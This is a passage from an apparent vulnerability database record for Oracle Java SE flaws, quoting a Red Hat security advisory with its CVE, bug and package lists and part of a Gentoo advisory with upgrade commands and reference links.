}, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2432" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0387" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0502" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1716" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1533" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2438" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1721" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0382" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5812" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-3213" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5846" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1718" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0497" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5775" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5787" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5898" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1531" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1481" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3563" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2433" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5844" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5906" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1711" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-1532" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1561" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2435" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1491" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5910" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1487" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1713" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5907" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5896" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5843" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5067" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1682" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0498" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2414" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2467" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5079" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1721" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-1479" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2434" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2442" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-2464" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5878" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0505" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-0408" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0402" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0506" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-5838" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2013-0430" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2012-5088" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5838" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5838.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-5800.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5800" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-5802" }, { "db": "BID", "id": "63135" }, { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "124071" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "124943" }, { "db": "PACKETSTORM", "id": "123722" }, { "db": "CNNVD", "id": "CNNVD-201310-380" }, { "db": "NVD", "id": "CVE-2013-5802" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2013-5802" }, { "db": "BID", "id": "63135" }, { "db": "PACKETSTORM", "id": "124303" }, { "db": "PACKETSTORM", "id": "124071" }, { "db": "PACKETSTORM", "id": "127267" }, { "db": "PACKETSTORM", "id": "123649" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "124943" }, { "db": "PACKETSTORM", "id": "123722" }, { "db": "CNNVD", "id": "CNNVD-201310-380" }, { "db": "NVD", "id": "CVE-2013-5802" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-10-16T00:00:00", "db": "VULMON", "id": "CVE-2013-5802" }, { "date": "2013-10-15T00:00:00", "db": "BID", "id": "63135" }, { "date": "2013-12-06T01:03:48", "db": "PACKETSTORM", "id": "124303" }, { "date": "2013-11-19T15:55:00", "db": "PACKETSTORM", "id": "124071" }, { "date": "2014-06-30T23:39:28", "db": "PACKETSTORM", "id": "127267" }, { "date": "2013-10-17T21:22:25", "db": "PACKETSTORM", "id": "123649" }, { "date": "2014-04-17T22:01:36", "db": "PACKETSTORM", "id": "126195" }, { "date": "2013-11-05T23:55:00", "db": "PACKETSTORM", "id": "123921" }, { "date": "2014-01-27T18:30:13", "db": "PACKETSTORM", "id": "124943" }, { "date": "2013-10-22T23:53:44", "db": "PACKETSTORM", "id": "123722" }, { "date": "2013-10-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201310-380" }, { "date": "2013-10-16T17:55:05.160000", "db": "NVD", "id": "CVE-2013-5802" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2013-5802" }, { "date": "2017-08-22T14:12:00", "db": "BID", "id": "63135" }, { "date": "2022-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201310-380" }, { "date": "2022-05-13T14:57:18.553000", "db": "NVD", "id": "CVE-2013-5802" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "123921" }, { "db": "PACKETSTORM", "id": "123722" }, { "db": "CNNVD", "id": "CNNVD-201310-380" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java SE/JRockit/Java SE Embedded JAXP Component security vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201310-380" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201310-380" } ], "trust": 0.6 } }
var-201404-0374
Vulnerability from variot
Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security. The vulnerability can be exploited over multiple protocols. This issue affects the 'Security' sub-component. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. Affects the confidentiality and integrity of data. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-ibm security update Advisory ID: RHSA-2014:0486-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0486.html Issue date: 2014-05-13 CVE Names: CVE-2013-6629 CVE-2013-6954 CVE-2014-0429 CVE-2014-0446 CVE-2014-0448 CVE-2014-0449 CVE-2014-0451 CVE-2014-0452 CVE-2014-0453 CVE-2014-0454 CVE-2014-0455 CVE-2014-0457 CVE-2014-0458 CVE-2014-0459 CVE-2014-0460 CVE-2014-0461 CVE-2014-1876 CVE-2014-2398 CVE-2014-2401 CVE-2014-2402 CVE-2014-2409 CVE-2014-2412 CVE-2014-2414 CVE-2014-2420 CVE-2014-2421 CVE-2014-2423 CVE-2014-2427 CVE-2014-2428 =====================================================================
- Summary:
Updated java-1.7.0-ibm packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, ppc, s390x, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
- Description:
IBM Java SE version 7 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section. (CVE-2014-0457, CVE-2014-2421, CVE-2014-0429, CVE-2014-0461, CVE-2014-0455, CVE-2014-2428, CVE-2014-0448, CVE-2014-0454, CVE-2014-0446, CVE-2014-0452, CVE-2014-0451, CVE-2014-2402, CVE-2014-2423, CVE-2014-2427, CVE-2014-0458, CVE-2014-2414, CVE-2014-2412, CVE-2014-2409, CVE-2014-0460, CVE-2013-6954, CVE-2013-6629, CVE-2014-2401, CVE-2014-0449, CVE-2014-0459, CVE-2014-0453, CVE-2014-2398, CVE-2014-1876, CVE-2014-2420)
All users of java-1.7.0-ibm are advised to upgrade to these updated packages, containing the IBM Java SE 7 SR7 release. All running instances of IBM Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1031734 - CVE-2013-6629 libjpeg: information leak (read of uninitialized memory) 1045561 - CVE-2013-6954 libpng: unhandled zero-length PLTE chunk or NULL palette 1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618) 1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736) 1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766) 1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841) 1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394) 1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854) 1087424 - CVE-2014-0455 OpenJDK: MethodHandle variable argument lists handling (Libraries, 8029844) 1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794) 1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010) 1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797) 1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152) 1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030) 1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188) 1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801) 1087438 - CVE-2014-2402 OpenJDK: Incorrect NIO channel separation (Libraries, 8026716) 1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740) 1087440 - CVE-2014-0454 OpenJDK: Prevent SIGNATURE_PRIMITIVE_SET from being modified (Security, 8029745) 1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163) 1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731) 1087444 - CVE-2014-0459 lcms: insufficient ICC profile version validation (OpenJDK 2D, 8031335) 1088024 - CVE-2014-0448 Oracle JDK: unspecified vulnerability fixed in 7u55 and 8u5 (Deployment) 1088025 - CVE-2014-2428 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088027 - CVE-2014-2409 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088028 - CVE-2014-0449 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088030 - CVE-2014-2401 Oracle JDK: unspecified vulnerability fixed in 5.0u75, 6u75, 7u55 and 8u5 (2D) 1088031 - CVE-2014-2420 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)
- Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm
ppc: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.ppc.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.ppc64.rpm
s390x: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.s390.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.s390x.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.i386.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el5_10.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm
ppc64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.ppc64.rpm
s390x: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.s390x.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.i686.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.i686.rpm
x86_64: java-1.7.0-ibm-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-demo-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-devel-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-jdbc-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-plugin-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm java-1.7.0-ibm-src-1.7.0.7.0-1jpp.1.el6_5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2013-6629.html https://www.redhat.com/security/data/cve/CVE-2013-6954.html https://www.redhat.com/security/data/cve/CVE-2014-0429.html https://www.redhat.com/security/data/cve/CVE-2014-0446.html https://www.redhat.com/security/data/cve/CVE-2014-0448.html https://www.redhat.com/security/data/cve/CVE-2014-0449.html https://www.redhat.com/security/data/cve/CVE-2014-0451.html https://www.redhat.com/security/data/cve/CVE-2014-0452.html https://www.redhat.com/security/data/cve/CVE-2014-0453.html https://www.redhat.com/security/data/cve/CVE-2014-0454.html https://www.redhat.com/security/data/cve/CVE-2014-0455.html https://www.redhat.com/security/data/cve/CVE-2014-0457.html https://www.redhat.com/security/data/cve/CVE-2014-0458.html https://www.redhat.com/security/data/cve/CVE-2014-0459.html https://www.redhat.com/security/data/cve/CVE-2014-0460.html https://www.redhat.com/security/data/cve/CVE-2014-0461.html https://www.redhat.com/security/data/cve/CVE-2014-1876.html https://www.redhat.com/security/data/cve/CVE-2014-2398.html https://www.redhat.com/security/data/cve/CVE-2014-2401.html https://www.redhat.com/security/data/cve/CVE-2014-2402.html https://www.redhat.com/security/data/cve/CVE-2014-2409.html https://www.redhat.com/security/data/cve/CVE-2014-2412.html https://www.redhat.com/security/data/cve/CVE-2014-2414.html https://www.redhat.com/security/data/cve/CVE-2014-2420.html https://www.redhat.com/security/data/cve/CVE-2014-2421.html https://www.redhat.com/security/data/cve/CVE-2014-2423.html https://www.redhat.com/security/data/cve/CVE-2014-2427.html https://www.redhat.com/security/data/cve/CVE-2014-2428.html https://access.redhat.com/security/updates/classification/#critical https://www.ibm.com/developerworks/java/jdk/alerts/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTcndLXlSAg2UNWIIRAidtAKC2xzybC9AZogqPqbKlnVNtoXAK9gCghl3w 7WuHx5m587mnR/PKDaPZlzw= =q8QV -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201502-12
http://security.gentoo.org/
Severity: Normal Title: Oracle JRE/JDK: Multiple vulnerabilities Date: February 15, 2015 Bugs: #507798, #508716, #517220, #525464 ID: 201502-12
Synopsis
Multiple vulnerabilities have been found in Oracle's Java SE Development Kit and Runtime Environment, the worst of which could lead to execution of arbitrary code. Please review the CVE identifiers referenced below for details.
Impact
A context-dependent attacker may be able to execute arbitrary code, disclose, update, insert, or delete certain data.
Workaround
There is no known workaround at this time.
Resolution
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.71"
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.71"
All users of the precompiled 32-bit Oracle JRE should upgrade to the latest version:
# emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.71"
References
[ 1 ] CVE-2014-0429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429 [ 2 ] CVE-2014-0432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432 [ 3 ] CVE-2014-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446 [ 4 ] CVE-2014-0448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448 [ 5 ] CVE-2014-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449 [ 6 ] CVE-2014-0451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451 [ 7 ] CVE-2014-0452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452 [ 8 ] CVE-2014-0453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453 [ 9 ] CVE-2014-0454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454 [ 10 ] CVE-2014-0455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455 [ 11 ] CVE-2014-0456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456 [ 12 ] CVE-2014-0457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457 